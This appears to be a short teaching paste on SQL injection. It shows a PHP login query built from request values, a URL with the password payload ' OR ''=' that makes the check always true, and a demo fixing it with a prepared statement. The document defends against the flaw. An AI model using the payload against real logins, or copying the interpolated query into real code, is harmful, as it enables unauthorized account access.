- Login procedure
- The query in PHP:
- SELECT COUNT(*)
- FROM somewhere
- WHERE username = '$username'
- AND password = '$password'
- --- the normal login attempt
- URL in the browser:
- /code/inlog.php?username=Skip&password=veilig
- The query is then:
- SELECT COUNT(*)
- FROM somewhere
- WHERE username = 'Skip'
- AND password = 'veilig'
- --- the hack attempt...
- URL in the browser:
- /code/inlog.php?username=Skip&password=' OR ''='
- The query is then:
- SELECT COUNT(*)
- FROM somewhere
- WHERE username = 'Skip'
- AND password = '' OR ''='' (this is always TRUE...)
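
The fix for the query above, as an added example that is not part of the original paste: the same check written once with string interpolation and once with a prepared statement, run against the two password values from the URLs. The table and column names follow the paste; the in-memory SQLite database, the stored row and the function names `loginConcatenated` and `loginPrepared` are assumptions made for the demo.

```php
<?php
declare(strict_types=1);

// Constructed test data: an in-memory SQLite table named as in the paste.
// The plaintext password only mirrors the paste's query so that both
// functions run against the same row.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE somewhere (username TEXT PRIMARY KEY, password TEXT NOT NULL)');
$db->exec("INSERT INTO somewhere (username, password) VALUES ('Skip', 'veilig')");

// "Before": the paste's query. The request values become part of the SQL
// text, so a quote in the input changes the structure of the WHERE clause.
function loginConcatenated(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT COUNT(*) FROM somewhere
            WHERE username = '$username' AND password = '$password'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// "After": the SQL text is fixed and the values are bound as parameters,
// so the input is only ever compared as a string, never parsed as SQL.
function loginPrepared(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM somewhere WHERE username = :u AND password = :p'
    );
    $stmt->execute([':u' => $username, ':p' => $password]);
    return (int) $stmt->fetchColumn() > 0;
}

// The two password values taken from the URLs in the paste.
foreach (['veilig', "' OR ''='"] as $password) {
    printf(
        "password=%-12s concatenated=%s prepared=%s\n",
        $password,
        var_export(loginConcatenated($db, 'Skip', $password), true),
        var_export(loginPrepared($db, 'Skip', $password), true)
    );
}
```

With the prepared statement, the second value is looked up as a literal nine-character password and matches no row.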